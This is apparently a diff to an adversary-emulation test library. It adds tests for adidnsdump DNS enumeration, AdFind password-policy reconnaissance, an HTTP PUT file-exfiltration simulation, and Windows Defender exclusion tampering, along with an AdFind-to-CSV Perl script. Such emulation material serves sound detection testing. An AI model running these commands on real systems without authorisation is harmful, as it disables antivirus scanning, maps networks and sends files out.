+- [Atomic Test #9 - Remote System Discovery - adidnsdump](#atomic-test-9---remote-system-discovery---adidnsdump)
+

 <br/>

@@ -258,4 +260,67 @@ foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.



+<br/>
+<br/>
+
+## Atomic Test #9 - Remote System Discovery - adidnsdump
+This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks
+Python 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test.
+Successful execution of this test will list dns zones in the terminal.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| user_name | username including domain. | string | domain&#92;user|
+| acct_pass | Account password. | string | password|
+| host_name | hostname or ip address to connect to. | string | 192.168.1.1|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Computer must have python 3 installed
+##### Check Prereq Commands:
+```powershell
+if (python --version) {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+echo "Python 3 must be installed manually"
+```
+##### Description: Computer must have pip installed
+##### Check Prereq Commands:
+```powershell
+if (pip3 -V) {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+echo "PIP must be installed manually"
+```
+##### Description: adidnsdump must be installed and part of PATH
+##### Check Prereq Commands:
+```powershell
+if (cmd /c adidnsdump -h) {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+pip3 install adidnsdump
+```
+
+
+
+
 <br/>
@@ -132,4 +132,50 @@ atomic_tests:
      foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}
    name: powershell
    elevation_required: true
-
+- name: Remote System Discovery - adidnsdump
+  auto_generated_guid: 95e19466-469e-4316-86d2-1dc401b5a959
+  description: |
+    This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks
+    Python 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test.
+    Successful execution of this test will list dns zones in the terminal.
+  supported_platforms:
+  - windows
+  input_arguments:
+    user_name:
+      description: username including domain.
+      type: string
+      default: 'domain\user'
+    acct_pass:
+      description: Account password.
+      type: string
+      default: "password"
+    host_name:
+      description: hostname or ip address to connect to.
+      type: string
+      default: "192.168.1.1"
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Computer must have python 3 installed
+    prereq_command: |
+      if (python --version) {exit 0} else {exit 1}
+    get_prereq_command: |
+      echo "Python 3 must be installed manually"
+  - description: |
+      Computer must have pip installed
+    prereq_command: |
+      if (pip3 -V) {exit 0} else {exit 1}
+    get_prereq_command: |
+      echo "PIP must be installed manually"
+  - description: |
+      adidnsdump must be installed and part of PATH
+    prereq_command: |
+      if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
+    get_prereq_command: |
+      pip3 install adidnsdump
+  executor:
+    command: |
+      adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
+    name: command_prompt
+    elevation_required: true
+    
@@ -0,0 +1,51 @@
+# T1020 - Automated Exfiltration
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1020)
+<blockquote>Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. 
+
+When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - IcedID Botnet HTTP PUT](#atomic-test-1---icedid-botnet-http-put)
+
+
+<br/>
+
+## Atomic Test #1 - IcedID Botnet HTTP PUT
+Creates a text file
+Tries to upload to a server via HTTP PUT method with ContentType Header
+Deletes a created file
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| file | Exfiltration File | String | C:&#92;temp&#92;T1020_exfilFile.txt|
+| domain | Destination Domain | url | https://google.com|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$fileName = "#{file}"
+$url = "#{domain}"
+$file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
+$contentType = "application/octet-stream"
+try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}
+```
+
+#### Cleanup Commands:
+```powershell
+$fileName = "#{file}"
+Remove-Item -Path $fileName -ErrorAction Ignore
+```
+
+
+
+
+
+<br/>
@@ -0,0 +1,32 @@
+attack_technique: T1020
+display_name: Automated Exfiltration
+atomic_tests:
+- name: IcedID Botnet HTTP PUT
+  auto_generated_guid: 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0
+  description: |-
+    Creates a text file
+    Tries to upload to a server via HTTP PUT method with ContentType Header
+    Deletes a created file
+  supported_platforms:
+  - windows
+  input_arguments:
+    file:
+      description: Exfiltration File
+      type: String
+      default: C:\temp\T1020_exfilFile.txt
+    domain:
+      description: Destination Domain
+      type: url
+      default: https://google.com
+  executor:
+    command: |-
+      $fileName = "#{file}"
+      $url = "#{domain}"
+      $file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
+      $contentType = "application/octet-stream"
+      try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}
+    cleanup_command: |-
+      $fileName = "#{file}"
+      Remove-Item -Path $fileName -ErrorAction Ignore
+    name: powershell
+  
@@ -174,5 +174,4 @@ atomic_tests:
  executor:
    command: |
      query user
-    name: powershell
-
+    name: powershell
@@ -14,6 +14,8 @@ Commands such as <code>net user /domain</code> and <code>net group /domain</code

 - [Atomic Test #4 - Automated AD Recon (ADRecon)](#atomic-test-4---automated-ad-recon-adrecon)

+- [Atomic Test #5 - Adfind -Listing password policy](#atomic-test-5---adfind--listing-password-policy)
+

 <br/>

@@ -142,4 +144,29 @@ Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRe



+<br/>
+<br/>
+
+## Atomic Test #5 - Adfind -Listing password policy
+Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy.
+reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+PathToAtomicsFolder\T1087.002\src\AdFind -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
+```
+
+
+
+
+
+
 <br/>
@@ -67,4 +67,14 @@ atomic_tests:
      Remove-Item #{adrecon_path} -Force -ErrorAction Ignore | Out-Null
      Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse
    name: powershell
-
+- name: Adfind -Listing password policy
+  auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600
+  description: | 
+    Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy.
+    reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      PathToAtomicsFolder\T1087.002\src\AdFind -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
+    name: powershell
@@ -0,0 +1,159 @@
+#****************************************************************************************
+#* ADCSV.PL                                                                             *
+#*======================================================================================*
+#* Author : joe@joeware.net                                                             *
+#* Version: V01.00.00                                                                   *
+#* Modification History:                                                                *
+#*    V01.00.00   2004.12.08  joe    Original Version                                   *
+#*--------------------------------------------------------------------------------------*
+#* This reads an ADFIND dump and CSVs it.                                               *
+#*--------------------------------------------------------------------------------------*
+#* Notes:                                                                               *
+#****************************************************************************************
+#****************************************************************************************
+
+
+#****************************************************************************************
+#* Definitions:                                                                         *
+#*--------------------------------------------------------------------------------------*
+#*    $TRUE         : Define True for testing.                                          *
+#*    $FALSE        : Define False for testing.                                         *
+#*    $YES          : Define Yes for testing.                                           *
+#*    $NO           : Define No for testing.                                            *
+#*    $SCRIPTPATH   : Path to script.                                                   *
+#****************************************************************************************
+$TRUE=1;
+$FALSE=0;
+$YES=1;
+$NO=0;
+($SCRIPTPATH)=($0=~/(^.*)\\.*$/);
+
+$csvdelim=";";
+$mvdelim=";";
+
+
+
+#
+# Display header
+#
+print "\nADCSV V01.00.00pl  Joe Richards (joe\@joeware.net)  December 2004\n\n";
+
+$update=0;
+$help=0;
+$infile="";
+$outfile="";
+
+
+map {
+     if (/\/infile:(.+)/i) {$infile=$1};
+     if (/\/outfile:(.+)/i) {$outfile=$1};
+     if (/\/csvdelim:(.+)/i) {$csvdelim=$1};
+     if (/\/mvdelim:(.+)/i) {$mvdelim=$1};
+     if (/\/(help|h|\?)/i) {$help=1};
+    } @ARGV;
+
+if ($help) {DisplayUsage()};
+if (!$infile) {DisplayUsage()};
+
+if (!$outfile) {$outfile=$infile.".txt"};
+
+#
+#
+# Extract attribs and insert into a hash
+#
+#
+$dncnt=0;
+$valcnt=0;
+%attribs=();
+print "Extracting fields from input file $infile...\n";
+open IFH,"<$infile" or die("ERR: Couldn't open infile ($infile):$!\n");
+foreach $this (<IFH>) 
+ {
+  $dncnt++ if $this=~/^dn:/;
+  next unless $this=~/^>(.+?): /;
+  $attribs{$1}=1;
+  $valcnt++;
+ }
+
+@attriblist=sort keys %attribs;
+$attribcnt=@attriblist;
+#map {print "$_\n"} @attriblist;
+
+print "DN Count: $dncnt\n";
+print "Unique Attribute Count: $attribcnt\n";
+print "Values Count: $valcnt\n";
+
+
+#
+#
+# Extract objects and slap them into CSV format output
+#
+#
+print "Parsing out objects and writing file $outfile\n";
+open OFH,">$outfile"  or die("ERR: Couldn't open outfile ($outfile):$!\n");
+OutputHeader(\@attriblist);
+$curdn="";
+%obj=();
+map {$obj{$_}=""} @attriblist;
+seek(IFH,0,0);
+foreach $this (<IFH>) 
+ {
+  next unless $this=~/^(dn:|>)/;
+  if ($this=~/^dn:(.+)/) 
+   {
+    print ".";
+    $newdn=$1;
+    if ($curdn) 
+     { # Have an object in storage
+      OutputObj($curdn,\%obj);
+      %obj=();
+      map {$obj{$_}=""} @attriblist;
+     }
+    $curdn=$newdn;
+    next;
+   }
+  chomp $this;
+  ($attrib,$value)=($this=~/^>(.+?): (.+)$/);
+  if ($obj{$attrib}=~/\S/) 
+   { # multivalue - think quick...
+    $obj{$attrib}.=$mvdelim.$value;
+   }
+  else {$obj{$attrib}=$value};
+ }
+if ($newdn) {OutputObj($curdn,\%obj)};
+
+close IFH;
+close OFH;
+
+print "\n\nThe command completed successfully.\n\n";
+exit;
+
+
+sub OutputHeader
+ {
+  my $h=shift;
+  print OFH "DN".$csvdelim;
+  map {print OFH "$_".$csvdelim} @$h;
+  print OFH "\n";
+ }
+
+sub OutputObj
+ {
+  my $dn=shift;
+  my $a=shift;
+  print OFH "\"$dn\"$csvdelim";
+  map {print OFH "\"$$a{$_}\"$csvdelim"} sort keys %$a;
+  print OFH "\n";
+ }
+
+
+sub DisplayUsage
+ {
+  print "  Usage: adcsv /infile:input_file [switches]\n\n";
+  print "    [switches]\n";
+  print "       outfile xxxx    File to output CSV to\n";
+  print "       csvdelim x      Delimiter to use for separation of attributes (;)\n";
+  print "       mvdelim x       Delimiter to use for separation of MV attribs (;)\n";
+  print "\n\n";
+  exit;
+ }
@@ -44,6 +44,12 @@

 - [Atomic Test #20 - Uninstall Crowdstrike Falcon on Windows](#atomic-test-20---uninstall-crowdstrike-falcon-on-windows)

+- [Atomic Test #21 - Tamper with Windows Defender Evade Scanning -Folder](#atomic-test-21---tamper-with-windows-defender-evade-scanning--folder)
+
+- [Atomic Test #22 - Tamper with Windows Defender Evade Scanning -Extension](#atomic-test-22---tamper-with-windows-defender-evade-scanning--extension)
+
+- [Atomic Test #23 - Tamper with Windows Defender Evade Scanning -Process](#atomic-test-23---tamper-with-windows-defender-evade-scanning--process)
+

 <br/>

@@ -713,4 +719,115 @@ if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet



+<br/>
+<br/>
+
+## Atomic Test #21 - Tamper with Windows Defender Evade Scanning -Folder
+Malware can exclude a specific path from being scanned and evading detection. 
+Upon successul execution, the file provided should be on the list of excluded path. 
+To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath 
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| excluded_folder | This folder will be excluded from scanning | String | C:&#92;Temp|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$excludedpath= "#{excluded_folder}"
+Add-MpPreference -ExclusionPath $excludedpath
+```
+
+#### Cleanup Commands:
+```powershell
+$excludedpath= "#{excluded_folder}"
+Remove-MpPreference -ExclusionPath $excludedpath
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #22 - Tamper with Windows Defender Evade Scanning -Extension
+Malware can exclude specific extensions from being scanned and evading detection. 
+Upon successful execution, the extension(s) should be on the list of excluded extensions.
+To check the exclusion list using poweshell  (Get-MpPreference).ExclusionExtension.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| excluded_exts | A list of extension to exclude from scanning | string | .exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$excludedExts= "#{excluded_exts}"
+Add-MpPreference -ExclusionExtension  $excludedExts
+```
+
+#### Cleanup Commands:
+```powershell
+$excludedExts= "#{excluded_exts}"
+Remove-MpPreference -ExclusionExtension  $excludedExts
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #23 - Tamper with Windows Defender Evade Scanning -Process
+Malware can exclude specific processes from being scanned and evading detection.
+Upon successful execution, the process(es) should be on the list of excluded processes. 
+To check the exclusion list using poweshell  (Get-MpPreference).ExclusionProcess."
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| excluded_process | A list of processes to exclude from scanning | string | outlook.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$excludedProcess = "#{excluded_process}"
+Add-MpPreference -ExclusionProcess $excludedProcess
+```
+
+#### Cleanup Commands:
+```powershell
+$excludedProcess = "#{excluded_process}"
+Remove-MpPreference -ExclusionProcess  $excludedProcess
+```
+
+
+
+
+
 <br/>
@@ -367,4 +367,69 @@ atomic_tests:
    command: if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}}
    name: powershell
    elevation_required: true
-
+- name: Tamper with Windows Defender Evade Scanning -Folder
+  auto_generated_guid: 0b19f4ee-de90-4059-88cb-63c800c683ed
+  description: | 
+    Malware can exclude a specific path from being scanned and evading detection. 
+    Upon successul execution, the file provided should be on the list of excluded path. 
+    To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath 
+  supported_platforms:
+  - windows
+  input_arguments:
+    excluded_folder:
+      description: This folder will be excluded from scanning
+      type: String
+      default: C:\Temp
+  executor:
+    command: |-
+      $excludedpath= "#{excluded_folder}"
+      Add-MpPreference -ExclusionPath $excludedpath
+    cleanup_command: | 
+      $excludedpath= "#{excluded_folder}"
+      Remove-MpPreference -ExclusionPath $excludedpath
+    name: powershell
+    elevation_required: true
+- name: Tamper with Windows Defender Evade Scanning -Extension
+  auto_generated_guid: 315f4be6-2240-4552-b3e1-d1047f5eecea
+  description: | 
+    Malware can exclude specific extensions from being scanned and evading detection. 
+    Upon successful execution, the extension(s) should be on the list of excluded extensions.
+    To check the exclusion list using poweshell  (Get-MpPreference).ExclusionExtension.
+  supported_platforms:
+  - windows
+  input_arguments:
+    excluded_exts:
+      description: A list of extension to exclude from scanning
+      type: string
+      default: .exe
+  executor:
+    command: |-
+      $excludedExts= "#{excluded_exts}"
+      Add-MpPreference -ExclusionExtension  $excludedExts
+    cleanup_command: | 
+      $excludedExts= "#{excluded_exts}"
+      Remove-MpPreference -ExclusionExtension  $excludedExts
+    name: powershell
+    elevation_required: true
+- name: Tamper with Windows Defender Evade Scanning -Process
+  auto_generated_guid: a123ce6a-3916-45d6-ba9c-7d4081315c27
+  description: |
+    Malware can exclude specific processes from being scanned and evading detection.
+    Upon successful execution, the process(es) should be on the list of excluded processes. 
+    To check the exclusion list using poweshell  (Get-MpPreference).ExclusionProcess."
+  supported_platforms:
+  - windows
+  input_arguments:
+    excluded_process:
+      description: A list of processes to exclude from scanning
+      type: string
+      default: outlook.exe
+  executor:
+    command: |-
+      $excludedProcess = "#{excluded_process}"
+      Add-MpPreference -ExclusionProcess $excludedProcess
+    cleanup_command: |
+      $excludedProcess = "#{excluded_process}"
+      Remove-MpPreference -ExclusionProcess  $excludedProcess
+    name: powershell
+    elevation_required: true
@@ -542,3 +542,9 @@ d9841bf8-f161-4c73-81e9-fd773a5ff8c1
 263ae743-515f-4786-ac7d-41ef3a0d4b2b
 2770dea7-c50f-457b-84c4-c40a47460d9f
 7c1acec2-78fa-4305-a3e0-db2a54cddecd
+9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0
+95e19466-469e-4316-86d2-1dc401b5a959
+736b4f53-f400-4c22-855d-1a6b5a551600
+0b19f4ee-de90-4059-88cb-63c800c683ed
+315f4be6-2240-4552-b3e1-d1047f5eecea
+a123ce6a-3916-45d6-ba9c-7d4081315c27